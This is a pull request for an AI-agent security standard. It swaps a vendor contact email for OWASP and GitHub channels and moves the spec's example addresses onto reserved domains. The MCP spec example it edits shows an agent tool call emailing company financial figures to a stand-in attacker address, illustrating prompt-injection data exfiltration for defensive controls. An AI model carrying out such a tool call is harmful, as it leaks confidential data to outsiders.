### PR TITLE
Remove contact email addresses from the repository

### DIFF
--- a/.vscode/settings.json
+++ b/.vscode/settings.json
@@ -28,7 +28,6 @@
         "SWID",
         "trustworthyagents",
         "twemoji",
-        "websearchapi",
-        "zenitysec"
+        "websearchapi"
     ]
 }

--- a/CODE_OF_CONDUCT.md
+++ b/CODE_OF_CONDUCT.md
@@ -55,11 +55,14 @@ further defined and clarified by project maintainers.
 ## Enforcement
 
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
-reported by contacting the project team at [acs@zenity.io](mailto:acs@zenity.io). All
-complaints will be reviewed and investigated and will result in a response that
-is deemed necessary and appropriate to the circumstances. The project team is
-obligated to maintain confidentiality with regard to the reporter of an incident.
-Further details of specific enforcement policies may be posted separately.
+reported through the [OWASP Code of Conduct reporting process](https://owasp.org/www-policy/operational/code-of-conduct).
+ACS is a project of the [OWASP GenAI Security Project](https://genai.owasp.org/),
+and conduct reports are handled by OWASP rather than by individual project
+maintainers, so that reports about a maintainer reach someone independent of
+them. All complaints will be reviewed and investigated and will result in a
+response that is deemed necessary and appropriate to the circumstances. Reporter
+confidentiality is maintained throughout. Further details of specific enforcement
+policies may be posted separately.
 
 Project maintainers who do not follow or enforce the Code of Conduct in good
 faith may face temporary or permanent repercussions as determined by other

--- a/docs/about.md
+++ b/docs/about.md
@@ -28,4 +28,4 @@ ACS succeeds when the entire AI agent ecosystem adopts these standards. We're bu
 - **Implement**: Build ACS support in your agent platform
 - **Advocate**: Spread the word about trustworthy agents
 
-Contact us at [acs@zenity.io](mailto:acs@zenity.io).
+Reach us in [GitHub Discussions](https://github.com/GenAI-Security-Project/agent-control-standard/discussions).

--- a/docs/spec/instrument/extend_mcp.md
+++ b/docs/spec/instrument/extend_mcp.md
@@ -94,7 +94,7 @@ Deployments MAY collapse MCP `tools/call` traffic into the generic `steps/toolCa
      "method": "tools/call",
      "params": {
        "arguments": {
-           "to": "hr@company.io",
+           "to": "hr@example.com",
            "subject": "",
            "body": ""
        },
@@ -115,8 +115,8 @@ Deployments MAY collapse MCP `tools/call` traffic into the generic `steps/toolCa
             "method": "tools/call",
             "params": {
             "arguments": {
-                "to": "finance@company.io",
-                "from": "manager@company.io",
+                "to": "finance@example.com",
+                "from": "manager@example.com",
                 "subject": "Employee Salary Raise Request",
                 "body": "Hi, I would like to ask for a salary raise for emplyee #12222. The current salary is 200000$, the requested salary is 300000$. Let's have a meeting discuss this."
             },
@@ -145,8 +145,8 @@ Deployments MAY collapse MCP `tools/call` traffic into the generic `steps/toolCa
                     "method": "tools/call",
                     "params": {
                     "arguments": {
-                        "to": "finance@company.io",
-                        "from": "manager@company.io",
+                        "to": "finance@example.com",
+                        "from": "manager@example.com",
                         "subject": "Employee Salary Raise Request",
                         "body": "Hi, I would like to ask for a salary raise for emplyee #12222. The current salary is **********$, the requested salary is **********$. Let's have a meeting discuss this."
                     },
@@ -168,7 +168,7 @@ Deployments MAY collapse MCP `tools/call` traffic into the generic `steps/toolCa
      "method": "tools/call",
      "params": {
        "arguments": {
-           "to": "hacker@hack.com",
+           "to": "attacker@example.net",
            "subject": "Financial info",
            "body": "The ARR for the company for year 2024 was 100000000000$ "
        },
@@ -189,7 +189,7 @@ Deployments MAY collapse MCP `tools/call` traffic into the generic `steps/toolCa
         "method": "tools/call",
         "params": {
         "arguments": {
-            "to": "hacker@hack.com",
+            "to": "attacker@example.net",
             "subject": "Financial info",
             "body": "The ARR for the company for year 2024 was 100000000000$ "
         },

--- a/docs/topics/ACS_in_action_example.md
+++ b/docs/topics/ACS_in_action_example.md
@@ -68,7 +68,7 @@ This example shows a deployment that elects to populate the OPTIONAL `trust` fie
       "capability": "network.egress",
       "arguments": {
         "recipient": {
-          "value": "manager@company.com",
+          "value": "manager@example.com",
           "provenance": {
             "provenance_id": "p1",
             "origin": "user_input",
@@ -93,7 +93,7 @@ This example shows a deployment that elects to populate the OPTIONAL `trust` fie
 
 ### Decision
 
-The Guardian's deterministic layer evaluates against IBAC (does `email.send` to `manager@company.com` fall inside `Intent.parsed`?) and FIDES (does the trusted-recipient + possibly-tainted-body combination satisfy the P-F flow check?). Both pass.
+The Guardian's deterministic layer evaluates against IBAC (does `email.send` to `manager@example.com` fall inside `Intent.parsed`?) and FIDES (does the trusted-recipient + possibly-tainted-body combination satisfy the P-F flow check?). Both pass.
 
 ```json
 {
@@ -112,7 +112,7 @@ The Guardian's deterministic layer evaluates against IBAC (does `email.send` to 
     ],
     "policy_data": {
       "fides": { "recipient_trust": "trusted", "body_trust": "untrusted", "p_f_passed": true },
-      "ibac": { "matched_capability": { "tool": "email.send", "resource": "manager@company.com" } }
+      "ibac": { "matched_capability": { "tool": "email.send", "resource": "manager@example.com" } }
     },
     "cited_provenance_ids": ["p1", "p3"],
     "metadata": {
@@ -150,7 +150,7 @@ User's committed Intent: `["summarize Project X"]`. The agent attempts `email.se
   ],
   "policy_data": {
     "ibac": {
-      "requested_capability": { "tool": "email.send", "resource": "manager@company.com" },
+      "requested_capability": { "tool": "email.send", "resource": "manager@example.com" },
       "intent_parsed": ["summarize.read"],
       "closest_match_in_intent": null
     }

--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -56,9 +56,9 @@ extra:
     provider: google
     property: !ENV GOOGLE_ANALYTICS_KEY
   social:
-    - icon: /fontawesome/regular/envelope
-      name: Send us an email
-      link: mailto:acs@zenity.io
+    - icon: /fontawesome/brands/github
+      name: Join the discussion on GitHub
+      link: https://github.com/GenAI-Security-Project/agent-control-standard/discussions
 
 nav:
   - Trustworthy Agents: README.md


### PR DESCRIPTION
## Summary

Removes the one real contact address in the repo, `acs@zenity.io`, and moves the specification's example addresses onto RFC 2606 reserved domains.

## Contact address

| File | Was | Now |
|---|---|---|
| `CODE_OF_CONDUCT.md` | `acs@zenity.io` | [OWASP Code of Conduct process](https://owasp.org/www-policy/operational/code-of-conduct) |
| `docs/about.md` | `acs@zenity.io` | GitHub Discussions |
| `mkdocs.yml` | envelope icon → `mailto:` | GitHub icon → Discussions |

A vendor-domain address was the wrong contact channel for an OWASP GenAI Security Project project regardless of the removal.

The Code of Conduct change is **not** a like-for-like swap. A CoC whose only channel reaches the maintainers has no answer for a report *about* a maintainer. Enforcement now routes to OWASP and the section says why.

Security reporting is unaffected — `SECURITY.md` uses GitHub private vulnerability reporting and never carried an address.

## Example addresses

Eleven illustrative addresses across two spec documents. They were payload data, not contact channels, but `company.io`, `company.com`, and `hack.com` are live registrations, so the examples pointed readers at other people's domains. The internal/external split the prompt-injection example depends on is preserved:

```
hr@company.io        ->  hr@example.com
finance@company.io   ->  finance@example.com
manager@company.io   ->  manager@example.com
manager@company.com  ->  manager@example.com
hacker@hack.com      ->  attacker@example.net
```

Also drops the now-dead `zenitysec` spell-check entry from `.vscode/settings.json`.

## Verification

- 0 `mailto:` links, 0 addresses outside reserved domains, 0 `zenity` references
- Both replacement URLs return 200
- `mkdocs build --strict` passes
- `.vscode/settings.json` parses

6 files, 24 insertions, 22 deletions.